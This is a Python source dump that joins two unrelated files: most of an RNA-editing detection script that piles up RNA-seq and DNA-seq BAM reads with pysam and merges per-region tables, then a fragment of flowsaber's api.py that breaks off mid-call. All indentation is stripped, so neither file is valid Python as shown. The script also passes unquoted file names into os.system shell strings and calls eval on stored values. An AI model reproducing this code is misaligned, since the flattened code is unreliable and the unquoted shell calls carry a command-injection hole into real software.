sys.stderr.write('Indexing Fasta file.\n')
pysam.faidx(fastafile)
###########################################################
# Check reference for name consistency
grefs=dgdic.keys()
rrefs={}
ridxinfo=pysam.idxstats(bamfile)
for j in ridxinfo.split('\n'): #MOD
l=(j.strip()).split('\t')
if l[0] in ['*','']: continue #MOD
if int(l[2])+int(l[3]) > 0: rrefs[l[0]]=int(l[1])
frefs=[]
fidxinfo=open(fastafile+'.fai')
for j in fidxinfo:
l=(j.strip()).split('\t')
if l[0]=='': continue
frefs.append(l[0])
fidxinfo.close()
# in rna-seq
rnof=[]
for i in rrefs.keys():
if i not in frefs: sys.stderr.write('WARNING: Region %s in RNA-Seq not found in reference file.\n' %(i))
if len(gbamfile)!=0:
for i in grefs:
if i not in frefs: sys.stderr.write('WARNING: Region %s in DNA-Seq not found in reference file.\n' %(i))
###########################################################
###########################################################
# Annotation file for working regions
if uwf:
if not os.path.exists(wfile):
usage()
sys.exit('GFF file %s not found.' %(wfile))
if sortann:
if not whereis('grep'): sys.exit('grep command not found.')
if not whereis('sort'): sys.exit('sort command not found.')
sys.stderr.write('Sorting GFF file.\n')
scmd='grep ^"#" %s; grep -v ^"#" %s | sort -k1,1 -k4,4n > %s' %(wfile,wfile,'workf_%s'%(pid))
os.system(scmd)
os.rename(wfile,wfile+'_old')
os.rename('workf_%s'%(pid),wfile)
if not os.path.exists(wfile+'.tbi'):
sys.stderr.write('Indexing GFF file.\n')
wfile=pysam.tabix_index(wfile, preset='gff')
###########################################################
# Annotation file for strand detection
if uann:
getstrand=0
if not os.path.exists(annfile):
usage()
sys.exit('Annotation file %s not found.' %(annfile))
if sortann:
if not whereis('grep'): sys.exit('grep command not found.')
if not whereis('sort'): sys.exit('sort command not found.')
sys.stderr.write('Sorting annotation file.\n')
scmd='grep ^"#" %s; grep -v ^"#" %s | sort -k1,1 -k4,4n > %s' %(annfile,annfile,'annotation_%s'%(pid))
os.system(scmd)
os.rename(annfile,annfile+'_old')
os.rename('annotation_%s'%(pid),annfile)
if not os.path.exists(annfile+'.tbi'):
sys.stderr.write('Indexing annotation file.\n')
annfile=pysam.tabix_index(annfile, preset='gff')
###########################################################
# Annotation file to exclude positions
if expos:
if not os.path.exists(exfile):
usage()
sys.exit('File %s not found.' %(exfile))
if sortann:
if not whereis('grep'): sys.exit('grep command not found.')
if not whereis('sort'): sys.exit('sort command not found.')
sys.stderr.write('Sorting file.\n')
scmd='grep ^"#" %s; grep -v ^"#" %s | sort -k1,1 -k4,4n > %s' %(exfile,exfile,'exfile_%s'%(pid))
os.system(scmd)
os.rename(exfile,exfile+'_old')
os.rename('exfile_%s'%(pid),exfile)
if not os.path.exists(exfile+'.tbi'):
sys.stderr.write('Indexing %s file.\n' %(exfile))
exfile=pysam.tabix_index(exfile, preset='gff')
###########################################################
#mainbam=pysam.Samfile(bamfile,"rb")
#regions=mainbam.references
#regionslens=mainbam.lengths
#mainbam.close()
dicregions=dict(rrefs.items())
#dicregions=dict([(regions[x],regionslens[x]) for x in range(len(regions))])
chrs=[x for x in dicregions.keys() if x not in nochrs]
if fworkR: sys.stderr.write('Analysis on region %s:%i-%i.\n' %(workR[0],workR[1][0],workR[1][1]))
else: sys.stderr.write('Analysis on %i regions.\n' %(len(chrs)))
###########################################################
if infolder!='': outfolder=os.path.join(outfolder_,'DnaRna_%s_%s' %(infolder,pid))
else: outfolder=os.path.join(outfolder_,'DnaRna_%s' %(pid))
if not os.path.exists(outfolder):
splitfolder=os.path.split(outfolder)
if not os.path.exists(splitfolder[0]): os.mkdir(splitfolder[0])
os.mkdir(outfolder)
outtable=os.path.join(outfolder,'outTable_%s' %(pid))
if slist:
slistfile=os.path.join(outfolder,'outPileupRNA_%s' %(pid))
if len(gbamfile)!=0: gslistfile=os.path.join(outfolder,'outPileupDNA_%s' %(pid))
#write command line and input parameters
f=open(os.path.join(outfolder,'parameters.txt'),'w')
f.writelines(params)
f.close()
###########################################################
d={}
if blatr:
badblat=blatfolder #os.path.join(blatfolder,'blatseqs_%s.bad'%(chr))
if os.path.exists(badblat):
sys.stderr.write('Using Blat mapping for RNAseq...\n')
f=open(badblat)
for i in f:
l=(i.strip()).split()
d[l[0]+'_'+l[1]]=int(l[1])
f.close()
sys.stderr.write('Found %i reads.\n'%(len(d)))
gd={}
if gblatr:
gbadblat=gblatfolder #os.path.join(blatfolder,'blatseqs_%s.bad'%(chr))
if os.path.exists(gbadblat):
sys.stderr.write('Using Blat mapping for DNAseq...\n')
f=open(gbadblat)
for i in f:
l=(i.strip()).split()
gd[l[0]+'_'+l[1]]=int(l[1])
f.close()
sys.stderr.write('Found %i reads.\n'%(len(gd)))
def exploreBAM(myinput):
isgbam=1
inputs=myinput.split('$')
chr,bamfile,start_region,lenregion,suff_=inputs[0],inputs[1],int(inputs[2]),int(inputs[3]),inputs[4]
if not dgdic.has_key(chr): isgbam=0
outfile=os.path.join(outfolder,'table_%s'%(suff_))
if slist:
if gziptab: outrna=gzip.open(os.path.join(outfolder,'pileupRNA_%s.gz'%(suff)),'wb')
else: outrna=open(os.path.join(outfolder,'pileupRNA_%s'%(suff)),'w')
if not nogbam and isgbam:
if gziptab: outdna=gzip.open(os.path.join(outfolder,'pileupDNA_%s.gz'%(suff)),'wb')
else: outdna=open(os.path.join(outfolder,'pileupDNA_%s'%(suff)),'w')
#d,di,gd={},{},{}
di,gd={},{}
bam=pysam.Samfile(bamfile,"rb")
if not nogbam and isgbam:
gbam=pysam.Samfile(dgdic[chr],"rb")
fasta=pysam.Fastafile(fastafile)
if uann: tabix=pysam.Tabixfile(annfile)
if expos: extabix=pysam.Tabixfile(exfile)
if uwf: wtabix=pysam.Tabixfile(wfile)
if gziptab:
outfile=outfile+'.gz'
out=gzip.open(outfile,'wb')
else: out=open(outfile,'w')
sys.stderr.write('Started analysis on region: %s:%i-%i\n'%(chr,start_region+1,lenregion))
#sys.stderr.write('OUTFILE: %s\n' %(outfile))
# if blatr:
# badblat=os.path.join(blatfolder,'blatseqs_%s.bad'%(chr))
# if os.path.exists(badblat):
# sys.stderr.write('Using Blat mapping for region %s\n'%(chr))
# f=open(badblat)
# for i in f:
# l=(i.strip()).split()
# d[l[0]+'_'+l[1]]=int(l[1])
# f.close()
# sys.stderr.write('Found %i reads for region %s\n'%(len(d),chr))
if gblatr:
gbadblat=os.path.join(gblatfolder,'blatseqs_%s.bad'%(chr))
if os.path.exists(gbadblat):
sys.stderr.write('Using Blat mapping for DNA region %s\n'%(chr))
f=open(gbadblat)
for i in f:
l=(i.strip()).split()
gd[l[0]+'_'+l[1]]=int(l[1])
f.close()
sys.stderr.write('Found %i reads for region %s\n'%(len(gd),chr))
if exss:
if os.path.exists(splicefile):
sys.stderr.write('Loading known splice sites for region %s\n'%(chr))
f=open(splicefile)
for i in f:
l=(i.strip()).split()
if l[0]!=chr: continue
st,tp,cc=l[4],l[3],int(l[1])
if st=='+' and tp=='D':
for j in range(nss): di[cc+(j+1)]=0
if st=='+' and tp=='A':
for j in range(nss): di[cc-(j+1)]=0
if st=='-' and tp=='D':
for j in range(nss): di[cc-(j+1)]=0
if st=='-' and tp=='A':
for j in range(nss): di[cc+(j+1)]=0
f.close()
sys.stderr.write('Loaded %i positions for %s\n'%(len(di),chr))
if greads:
outreads=open(os.path.join(outfolder,'readsRNA_%s'%(suff_)),'w')
grdb={}
if addP:
outAddP=open(os.path.join(outfolder,'readsPosRNA_%s'%(suff_)),'w')
grdb2={}
for kpos in range(start_region,lenregion,chunckval):
startk,endk=kpos,(kpos+chunckval)-1
if endk > lenregion: endk=lenregion-1
#sys.stderr.write('%i %i\n'%(startk,endk))
# check features in the give region if GFF provided
if uwf:
if chr in wtabix.contigs:
wfeat=[parseFeat(feat) for feat in wtabix.fetch(reference=chr,start=startk,end=endk)]
if len(wfeat)==0: continue
wcoords,startk,endk=newCoords(wfeat,startk,endk)
else: continue
# get FASTA sequence
#print startk,endk
#refgenome=fasta.fetch(chr,startk,endk+1).upper()
#print refgenome
# explore dna-seq bam
#####################
gdic={}
if not nogbam and isgbam:
for pileupcolumn in gbam.pileup(chr,startk,endk,stepper='nofilter', max_depth=MAX_DEPTH):
if uwf and not checkPos(wcoords,pileupcolumn.reference_pos): continue
if not startk<=pileupcolumn.reference_pos<=endk: continue
gref=fasta.fetch(chr,pileupcolumn.reference_pos,pileupcolumn.reference_pos+1).upper()
gseq,gqual,gstrand,gblatc,gsqual='',0,'','',[]
if grmsh:
if ((pileupcolumn.reference_pos+1)-ghomo)-1 < 0: sequp=''
else: sequp=(fasta.fetch(chr,((pileupcolumn.reference_pos+1)-ghomo)-1,(pileupcolumn.reference_pos+1)-1)).upper()
seqdw=(fasta.fetch(chr,pileupcolumn.reference_pos+1,(pileupcolumn.reference_pos+1)+ghomo)).upper()
for pileupread in pileupcolumn.pileups: # per ogni base dell'allineamento multiplo
if pileupread.is_del: continue
if pileupread.alignment.is_qcfail: continue
#gs,gq,gt,gqq=pileupread.alignment.seq[pileupread.qpos].upper(),ord(pileupread.alignment.qual[pileupread.qpos])-gQVAL,'*',pileupread.alignment.qual[pileupread.qpos]
# multiple hits
if gexh:
if pileupread.alignment.is_secondary: continue
if pileupread.alignment.has_tag('NH'):
if pileupread.alignment.get_tag('NH') > 1: continue
# duplicates
if gexd and pileupread.alignment.is_duplicate: continue
# se paired end
if gconc: # se devi usare solo le paired
# se non sono paired
if not pileupread.alignment.is_paired: continue
# se non sono concordanti
if not pileupread.alignment.is_proper_pair: continue
# se concordanti ma nello stesso orientamento
flag=pileupread.alignment.flag
if pileupread.alignment.is_duplicate: flag=flag-1024
if pileupread.alignment.is_secondary: flag=flag-256
if flag in [67,131,115,179]: continue
# mapping quality
if gmq and pileupread.alignment.mapping_quality < gMAPQ: continue
#se la qualita' >= della qualita' minima
gs,gq,gt,gqq=pileupread.alignment.query_sequence[pileupread.query_position].upper(),pileupread.alignment.query_qualities[pileupread.query_position],'*',pileupread.alignment.query_qualities[pileupread.query_position]
if gq >= gMQUAL and pileupcolumn.reference_pos in pileupread.alignment.get_reference_positions():
if grmnuc:
grlen=pileupread.alignment.query_length #pileupread.alignment.qlen #lunghezza della specifica read
gqp=pileupread.query_position
if grmp[0]>0: #rimuovi posizioni al 5'
if pileupread.alignment.is_reverse:
if (pileupread.alignment.query_alignment_end-grmp[1])+1 <=gqp<= pileupread.alignment.query_alignment_end: continue
else:
if pileupread.alignment.query_alignment_start <=gqp<= (pileupread.alignment.query_alignment_start+grmp[0])-1: continue
if grmp[1]>0: #rimuovi posizioni al 3'
if pileupread.alignment.is_reverse:
if pileupread.alignment.query_alignment_start <=gqp<= (pileupread.alignment.query_alignment_start+grmp[0])-1: continue
else:
if (pileupread.alignment.query_alignment_end-grmp[1])+1 <=gqp<= pileupread.alignment.query_alignment_end: continue
# se la read di appartenenza non mappa in modo univoco con Blat
if gblatr:
rt=0
if pileupread.alignment.is_read1: rt=1
elif pileupread.alignment.is_read2: rt=2
rname=pileupread.alignment.query_name+'_%i'%(rt)
if gd.has_key(rname): gblatc+='0' #continue
else: gblatc+='1'
# se la base e' diversa dal reference
# se in regione omopolimerica scarta
if grmsh and rmHomo(sequp,seqdw,ghomo,gref): continue
gseq+=gs
gqual+=gq
gstrand+=gt
gsqual.append(gqq)
if gseq.strip()!='':
if gblatr:
if testBlat(gblatc): gseq,gqual,gsqual,gstrand=normByBlat(gseq,gstrand,gsqual,gblatc,gQVAL)
else: continue
gcov,gbcomp,gsubs,gfreq=BaseCount(gseq,gref,gmmf,0)
if gcov < gMINCOV: continue
gmqua=meanq(gqual,len(gseq))
ghinfo=0 # non omozigote
if gsubs=='-': ghinfo=1 # omozigote
gdic[pileupcolumn.reference_pos]=([str(gcov),gmqua,str(gbcomp),gsubs,gfreq],ghinfo)
if slist:
if not nogbam and isgbam: outdna.write('\t'.join([chr,str(pileupcolumn.reference_pos+1),gref,gseq,gsqual])+'\n')
#####################
# explore rna-seq bam
#print startk,endk, wcoords
for pileupcolumn in bam.pileup(chr,startk,endk,stepper='nofilter',max_depth=MAX_DEPTH):
#print chr,startk,endk
#print dir(pileupcolumn)
if uwf and not checkPos(wcoords,pileupcolumn.reference_pos): continue
#print pileupcolumn.reference_pos
if not startk<=pileupcolumn.reference_pos<=endk: continue
#print
#print chr,pileupcolumn.reference_pos+1
ref=fasta.fetch(chr,pileupcolumn.reference_pos,pileupcolumn.reference_pos+1).upper()
#seq,qual,strand,squal,blatc='',0,'','',''
seq,qual,strand,blatc,squal='',0,'','',[]
if rmOver: rall=[]
if rmIndel: indels=[]
if rmsh:
if ((pileupcolumn.reference_pos+1)-homo)-1 < 0: sequp=''
else: sequp=(fasta.fetch(chr,((pileupcolumn.reference_pos+1)-homo)-1,(pileupcolumn.reference_pos+1)-1)).upper()
seqdw=(fasta.fetch(chr,pileupcolumn.reference_pos+1,(pileupcolumn.reference_pos+1)+homo)).upper()
for pileupread in pileupcolumn.pileups: # per ogni base dell'allineamento multiplo
#if pileupread.alignment.is_supplementary and not pileupread.is_del: print pileupread.alignment
if pileupread.is_del: continue
if pileupread.alignment.is_qcfail: continue
if pileupread.alignment.is_supplementary: continue
if pileupread.alignment.has_tag('SA'): continue
#print pileupread
#print dir(pileupread)
#print
#print dir(pileupread.alignment)
#print pileupread.alignment.get_tag('NM')
#s,q,t,qq=pileupread.alignment.query_sequence[pileupread.query_position].upper(),pileupread.alignment.query_qualities[pileupread.query_position],'*',pileupread.alignment.qual[pileupread.query_position]
#s,q,t,qq=pileupread.alignment.seq[pileupread.qpos].upper(),ord(pileupread.alignment.qual[pileupread.qpos])-QVAL,'*',pileupread.alignment.qual[pileupread.qpos]
# escludi posizioni introniche nei pressi di splice sites
if exss and di.has_key(pileupcolumn.reference_pos+1): continue
# multiple hit
if exh:
if pileupread.alignment.is_secondary: continue
if pileupread.alignment.has_tag('NH'):
if pileupread.alignment.get_tag('NH') > 1: continue
# duplicates
if exd and pileupread.alignment.is_duplicate: continue
# se paired end
if conc: # se devi usare solo le paired
# se non sono paired
if not pileupread.alignment.is_paired: continue
# se non sono concordanti
if not pileupread.alignment.is_proper_pair: continue
# se concordanti ma nello stesso orientamento
flag=pileupread.alignment.flag
if pileupread.alignment.is_duplicate: flag=flag-1024
if pileupread.alignment.is_secondary: flag=flag-256
if flag in [67,131,115,179]: continue
#print pileupread.alignment.qual
#print pileupread.alignment.flag
#print pileupread.alignment.is_paired
# mapping quality
if mq and pileupread.alignment.mapping_quality < MAPQ: continue
#print pileupread.alignment.query_sequence
if not pileupread.alignment.query_qualities: pileupread.alignment.query_qualities=[30 for vn in range(len(pileupread.alignment.query_sequence))]
#print pileupread.query_position
#s,q,t,qq=pileupread.alignment.query_sequence[pileupread.query_position].upper(),pileupread.alignment.query_qualities[pileupread.query_position],'*',pileupread.alignment.qual[pileupread.query_position]
s,q,t,qq=pileupread.alignment.query_sequence[pileupread.query_position].upper(),pileupread.alignment.query_qualities[pileupread.query_position],'*',pileupread.alignment.query_qualities[pileupread.query_position]
#print s,q,pileupcolumn.reference_pos+1
if rmIndel:
indelALN=pileupread.alignment.get_aligned_pairs(matches_only=False, with_seq=True)
for nn in indelALN:
if nn[0]==pileupread.query_position:
idx_=indelALN.index(nn)
break
indelreg=indelALN[idx_-5:idx_]+[('-','-','-')]+indelALN[idx_+1:idx_+6]
#print pileupread.alignment.query_name, pileupcolumn.reference_pos+1
#print indelreg
indel=countIndels(indelreg)
#se la qualita' >= alla qualita' minima
if q >= MQUAL and pileupcolumn.reference_pos in pileupread.alignment.get_reference_positions():
#tags=dict(pileupread.alignment.tags)
#deduci la strand per ogni posizione
if getstrand:
#usa le info del mapping se strand oriented
if pileupread.alignment.is_read1:
if unchange1:
if pileupread.alignment.is_reverse: t='-'
else: t='+'
else:
if pileupread.alignment.is_reverse: t='+'
else: t='-'
elif pileupread.alignment.is_read2:
if unchange2:
if pileupread.alignment.is_reverse: t='-'
else: t='+'
else:
if pileupread.alignment.is_reverse: t='+'
else: t='-'
else: # for single ends
if unchange1:
if pileupread.alignment.is_reverse: t='-'
else: t='+'
else:
if pileupread.alignment.is_reverse: t='+'
else: t='-'
if rmnuc:
rlen=pileupread.alignment.query_length #pileupread.alignment.qlen #lunghezza della specifica read
qp=pileupread.query_position
#print pileupcolumn.reference_pos+1, qp
#print pileupread.alignment
#print pileupread.alignment.query_name,pileupread.alignment.get_aligned_pairs(matches_only=False, with_seq=False)
#print pileupread.alignment, qp , pileupread.alignment.is_reverse,pileupread.alignment.query_sequence[pileupread.query_position].upper()
#print (pileupread.alignment.query_alignment_end-rmp[1]),pileupread.alignment.query_alignment_end-1
#print pileupread.alignment.query_alignment_start, (pileupread.alignment.query_alignment_start+rmp[0])-1
if rmp[0]>0: #rimuovi posizioni al 5'
if pileupread.alignment.is_reverse:
if (pileupread.alignment.query_alignment_end-rmp[1]) <=qp<= pileupread.alignment.query_alignment_end-1: continue
else:
if pileupread.alignment.query_alignment_start <=qp<= (pileupread.alignment.query_alignment_start+rmp[0])-1: continue
if rmp[1]>0: #rimuovi posizioni al 3'
if pileupread.alignment.is_reverse:
if pileupread.alignment.query_alignment_start <=qp<= (pileupread.alignment.query_alignment_start+rmp[0])-1: continue
else:
if (pileupread.alignment.query_alignment_end-rmp[1]) <=qp<= pileupread.alignment.query_alignment_end-1: continue
#print qp, rmp
#if pileupread.alignment.is_reverse:
# if qp>(rlen-rmp[0])-1: continue
# if qp<rmp[1]:continue
#else:
# if qp<rmp[0]:continue
# if qp>(rlen-rmp[1])-1: continue
# se la read di appartenenza non mappa in modo univoco con Blat
if blatr:
rt=0
if pileupread.alignment.is_read1: rt=1
elif pileupread.alignment.is_read2: rt=2
else: rt=0
rname=pileupread.alignment.query_name+'_%i'%(rt)
if d.has_key(rname): blatc+='0' #continue
else: blatc+='1'
# se la base e' diversa dal reference
# se in regione omopolimerica scarta
if rmsh and rmHomo(sequp,seqdw,homo,ref): continue
seq+=s
qual+=q
strand+=t
squal.append(qq)
if rmIndel: indels.append(indel)
if rmOver: rall.append((pileupread.alignment.query_name,ref,s))
if greads: # --reads option
if ref!=s:
rt=0
if pileupread.alignment.is_read1: rt=1
elif pileupread.alignment.is_read2: rt=2
else: rt=0
rqname=pileupread.alignment.query_name+'_%i'%(rt)
rname=pileupread.alignment.query_name
rseqname=pileupread.alignment.query_sequence
#print rqname, rseqname, pileupread.alignment.is_unmapped, chr, pileupread.alignment.reference_start,pileupread.alignment.reference_end
#rqname_comp=rqname+'$'+chr+'$'+str(pileupread.alignment.reference_start)+'$'+str(pileupread.alignment.reference_end)
#print pileupread.alignment.query_name,chr,pileupread.alignment.reference_start,pileupread.alignment.reference_end
#print chr,pileupread.alignment.reference_name
if not pileupread.alignment.is_unmapped and rt!=0:
try:
mate=bam.mate(pileupread.alignment)
addpos=(pileupread.alignment.query_name,mate.query_name,pileupread.alignment.reference_name,mate.reference_name,pileupread.alignment.reference_start,pileupread.alignment.reference_end,mate.reference_start , mate.reference_end)
except:
addpos=(pileupread.alignment.query_name,'-',pileupread.alignment.reference_name,'-',pileupread.alignment.reference_start,pileupread.alignment.reference_end,0 , 0)
#print mate.query_name, mate.reference_start , mate.reference_end
else: addpos=(pileupread.alignment.query_name,'-',pileupread.alignment.reference_name,'-',pileupread.alignment.reference_start,pileupread.alignment.reference_end,0 , 0)
rqname_comp=rqname+'$'+pileupread.alignment.reference_name+'$'+str(pileupcolumn.reference_pos+1)
#addpos=(chr+'_'+str(pileupcolumn.reference_pos+1),pileupcolumn.reference_pos+1)
if not grdb.has_key(rqname):
#print rqname reference_start
outreads.write('>'+rqname_comp+'\n'+rseqname+'\n')
#grdb[rqname]=[addpos]
#else:
# if addpos not in grdb[rqname]:
# grdb[rqname].append(addpos)
if addP:
if not grdb2.has_key(rname): grdb2[rname]=addpos
if seq.strip()!='':
#print seq,qual,squal
if rmIndel:
#print 'Indels:',indels
seq,qual,squal,strand,blatc=normByIndels(seq,strand,squal,blatc,indels)
if rmOver:
over_=getOverlap(rall)
seq,qual,squal,strand,blatc=normByOverlap(seq,strand,squal,blatc,over_)
#if over_.count(1)>0:
# print chr,pileupcolumn.reference_pos+1
# print seq
# print 'Over:',over_
# print blatc
if blatr:
if testBlat(blatc): seq,qual,squal,strand=normByBlat(seq,strand,squal,blatc)
else: continue
mystrand='2'
#print seq,strand,strand.count('+'),strand.count('-')
if uann and not getstrand:
if chr in tabix.contigs:
sres=[kk.strand for kk in tabix.fetch(reference=chr,start=(pileupcolumn.reference_pos),end=(pileupcolumn.reference_pos+1),parser=pysam.asGTF())]
mystrand=vstrand(sres)
if getstrand and not uann:
mystr=vstand(strand)
if mystr=='-': mystrand='0'
elif mystr=='+': mystrand='1'
else: mystrand='2'
if mystrand=='0':
seq=comp(seq)
ref=comp(ref)
if mystrand in ['0','1'] and corrstr:
seq,qual,squal=normByStrand(seq,strand,squal,mystrand)
#print qual,squal
cov,bcomp,subs,freq=BaseCount(seq,ref,mmf,vnuc)
if cov < MINCOV: continue
if exms and subs.count(' ')>0: continue
mqua=meanq(qual,len(seq))
#print mqua
if expos:
if chr in extabix.contigs:
exres=[kk for kk in extabix.fetch(reference=chr,start=(pileupcolumn.reference_pos),end=(pileupcolumn.reference_pos+1))]
if len(exres)>0: continue
# se la sostituzione non e' in usubs
if exinv and subs=='-': continue
if not checkSubs(subs): continue
#print out rna-seq info + dna-seq
if gdic.has_key(pileupcolumn.reference_pos): # abbiamo l'informazione genomica
if exnonh and not gdic[pileupcolumn.reference_pos][1]: continue
if mystrand=='0':
gdic[pileupcolumn.reference_pos][0][2]=comp2(eval(gdic[pileupcolumn.reference_pos][0][2]))
gdic[pileupcolumn.reference_pos][0][3]=comp(gdic[pileupcolumn.reference_pos][0][3])
line='\t'.join([chr,str(pileupcolumn.reference_pos+1),ref,mystrand,str(cov),mqua,str(bcomp),subs,freq]+gdic[pileupcolumn.reference_pos][0])+'\n'
out.write(line)
else:
if exnosupp: continue
line='\t'.join([chr,str(pileupcolumn.reference_pos+1),ref,mystrand,str(cov),mqua,str(bcomp),subs,freq]+['-','-','-','-','-'])+'\n'
out.write(line)
if slist: outrna.write('\t'.join([chr,str(pileupcolumn.reference_pos+1),ref,seq,squal])+'\n')
bam.close()
if not nogbam and isgbam: gbam.close()
fasta.close()
out.close()
if uwf: wtabix.close()
if uann: tabix.close()
if expos: extabix.close()
if slist:
outrna.close()
if not nogbam and isgbam: outdna.close()
if os.path.getsize(outfile)==0: os.remove(outfile)
if greads: outreads.close()
if addP:
for Name in grdb2:
pn=grdb2[Name]
if pn[1]=='-':
pcoo=[pn[4],pn[5]]
pcoo.sort()
outAddP.write('%s\t%i\t%i\n' %(pn[2],pcoo[0]-100,pcoo[-1]+100))
else:
if pn[0]==pn[1] and pn[2]==pn[3]:
pcoo=[xy for xy in pn[4:]]
pcoo.sort()
outAddP.write('%s\t%i\t%i\n' %(pn[2],pcoo[0]-100,pcoo[-1]+100))
#outAddP.write('%s\t%s\n' %(Name,str(grdb2[Name])))
outAddP.close()
sys.stderr.write('Job completed for region: %s:%i-%i\n'%(chr,start_region+1,lenregion))
def do_work1(q): #not in use
while True:
try:
x=q.get(block=False)
if x==None: continue
exploreBAM(x)
except Empty:
break
def do_work(q):
while True:
x=q.get(block=True)
if x==None: break
exploreBAM(x)
####
wRegions=[]
if fworkR:
if NCPU==1: wRegions.append((workR[0],workR[1][0]-1,workR[1][1]))
elif NCPU > 1:
wlen=workR[1][1]-workR[1][0]
wint=wlen/NCPU
wstart=workR[1][0]-1
for i in range(NCPU-1):
wRegions.append((workR[0],wstart,wstart+wint))
wstart=(wstart+wint)
wRegions.append((workR[0],wstart,workR[1][1]))
####
work_queue = Queue()
suffix=[]
kkn=0
if fworkR:
for i in wRegions:
suff='%s_%s_%i' %(i[0],pid,kkn)
suffix.append(suff)
strinput='$'.join([i[0],bamfile,str(i[1]),str(i[2]),suff]) #i+'$'+bamfile
#print strinput
work_queue.put(strinput)
kkn+=1
else:
for i in chrs:
suff='%s_%s_%i' %(i,pid,kkn)
suffix.append(suff)
strinput='$'.join([i,bamfile,'0',str(dicregions[i]),suff]) #i+'$'+bamfile
#print strinput
work_queue.put(strinput)
kkn+=1
"""
processes=[Process(target=do_work, args=(work_queue,)) for i in range(NCPU)]
for t in processes:
t.start()
for t in processes:
t.join()
time.sleep(0.5)
"""
processes=[]
for i in range(NCPU):
work_queue.put(None)
t=Process(target=do_work, args=(work_queue,))
t.start()
processes.append(t)
for t in processes:
t.join()
work_queue.empty()
#
head='Region\tPosition\tReference\tStrand\tCoverage-q%i\tMeanQ\tBaseCount[A,C,G,T]\tAllSubs\tFrequency\tgCoverage-q%i\tgMeanQ\tgBaseCount[A,C,G,T]\tgAllSubs\tgFrequency\n' %(MQUAL,gMQUAL)
sys.stderr.write('Merging Tables.\n')
if gziptab: o=gzip.open(outtable+'.gz','wb')
else: o=open(outtable,'w')
if noheader==0: o.write(head)
if slist:
if gziptab: o2=gzip.open(slistfile+'.gz','wb')
else: o2=open(slistfile,'w')
if len(gbamfile)!=0:
if gziptab: o3=gzip.open(gslistfile+'.gz','wb')
else: o3=open(gslistfile,'w')
if greads:
outReadsFile=os.path.join(outfolder,'outReads_%s' %(pid))
o4=open(outReadsFile,'w')
if addP:
outPosFile=os.path.join(outfolder,'outPosReads_%s' %(pid))
o5=open(outPosFile,'w')
for i in suffix:
if gziptab: tabfile=os.path.join(outfolder,'table_%s.gz' %(i))
else: tabfile=os.path.join(outfolder,'table_%s' %(i))
if os.path.exists(tabfile):
if gziptab: f=gzip.open(tabfile,'rb')
else: f=open(tabfile)
for j in f: o.write(j)
f.close()
os.remove(tabfile)
if slist:
if len(gbamfile)!=0:
if gziptab: dnafile=os.path.join(outfolder,'pileupDNA_%s.gz' %(i))
else: dnafile=os.path.join(outfolder,'pileupDNA_%s' %(i))
if os.path.exists(dnafile):
if gziptab: f=gzip.open(dnafile,'rb')
else: f=open(dnafile)
for j in f: o3.write(j)
f.close()
os.remove(dnafile)
if gziptab: rnafile=os.path.join(outfolder,'pileupRNA_%s.gz' %(i))
else: rnafile=os.path.join(outfolder,'pileupRNA_%s' %(i))
if os.path.exists(rnafile):
if gziptab: f=gzip.open(rnafile,'rb')
else: f=open(rnafile)
for j in f: o2.write(j)
f.close()
os.remove(rnafile)
if greads:
readsfile=os.path.join(outfolder,'readsRNA_%s' %(i))
if os.path.exists(readsfile):
f=open(readsfile)
for j in f: o4.write(j)
f.close()
os.remove(readsfile)
if addP:
addPfile=os.path.join(outfolder,'readsPosRNA_%s' %(i))
if os.path.exists(addPfile):
f=open(addPfile)
for j in f: o5.write(j)
f.close()
os.remove(addPfile)
o.close()
if slist:
o2.close()
if len(gbamfile)!=0: o3.close()
sys.stderr.write('Results saved on %s\n'%(outtable))
if slist:
if len(gbamfile)!=0: sys.stderr.write('Pileup for DNA saved on %s\n'%(gslistfile))
sys.stderr.write('Pileup for RNA saved on %s\n'%(slistfile))
if greads:
o4.close()
sys.stderr.write('RNA reads saved on %s\n'%(outReadsFile))
fastqFiles={'r1':os.path.join(outfolder,'R1_%s.fq' %(pid)),'r2':os.path.join(outfolder,'R2_%s.fq' %(pid))}
for i in range(1,len(fastq)+1):
sys.stderr.write('Getting reads R%i\n'%(i))
cmd='/opt/exp_soft/biomed/epicardi/bin/seqtk subseq %s %s > %s' %(fastq[i-1],outReadsFile,fastqFiles['r'+str(i)])
os.system(cmd)
for i in range(1,len(fastq)+1):
sys.stderr.write('RNA reads in FASTQ saved on %s\n'%(fastqFiles['r'+str(i)]))
if addP: o5.close()
script_time=time.strftime("%d/%m/%Y %H:%M:%S", time.localtime(time.time()))
sys.stderr.write("Script time --> END: %s\n"%(script_time))
|
api.py
|
"""
Expose all variables in core sub-package.
"""
# noinspection PyUnresolvedReferences
import flowsaber
# noinspection PyUnresolvedReferences
from flowsaber.core.channel import *
# noinspection PyUnresolvedReferences
from flowsaber.core.engine.flow_runner import *
# noinspection PyUnresolvedReferences
from flowsaber.core.engine.task_runner import *
# noinspection PyUnresolvedReferences
from flowsaber.core.flow import *
# noinspection PyUnresolvedReferences
from flowsaber.core.operators import *
# noinspection PyUnresolvedReferences
from flowsaber.core.task import *
# noinspection PyUnresolvedReferences
from flowsaber.core.task import *
# noinspection PyUnresolvedReferences
from flowsaber.core.utility.cache import *
# noinspection PyUnresolvedReferences
from flowsaber.core.utility.executor import *
# noinspection PyUnresolvedReferences
from flowsaber.core.utility.state import *
# noinspection PyUnresolvedReferences
from flowsaber.core.utility.target import *
# noinspection PyUnresolvedReferences
from flowsaber.core.utils import *
# noinspection PyUnresolvedReferences
from flowsaber.tasks import *
def run(flow: Flow, server_address: str = None,
agent_id: str = None, context: dict = None,
id: str = None, name: str = None, labels: list = None, **kwargs):
"""
Parameters
----------
flow
server_address
agent_id
context
id
name
labels
kwargs
Returns
-------
"""
from flowsaber.client.client import Client, GraphqlError
assert flow.state == Flow.INITIALIZED, "The flow must be initialized and not being executed yet."
context = context or {}
with flowsaber.context(context) as context:
merged_context = context.to_dict()
loop = asyncio.get_event_loop()
if not agent_id:
flowsaber.context.logger.info("Run the flow in local.")
runner = FlowRunner(flow, server_address=server_address)
if not loop.is_running():
runner.run(context=merged_context)
else:
# this often happens in jupyter notebook where the event loop is already running
flowsaber.context.logger.info("Found a running eventloop, run in another thread, "
"this often happens in jupyter notebook.")
from threading import Thread
flow_thread = Thread(target=runner.run, kwargs={'context': merged_context})
flow_thread.start()
else:
assert server_address, "Must specify a server to schedule flowrun in remote agent."
flowrun_input = FlowRunInput(
id=id or flowsaber.context.random_id,
name=name or flowsaber.context.random_id,
labels=labels or [],
context=merged_context,
state=Scheduled().to_dict(),
flow_id=flow.config_dict['id'],
agent_id=agent_id,
**kwargs
)
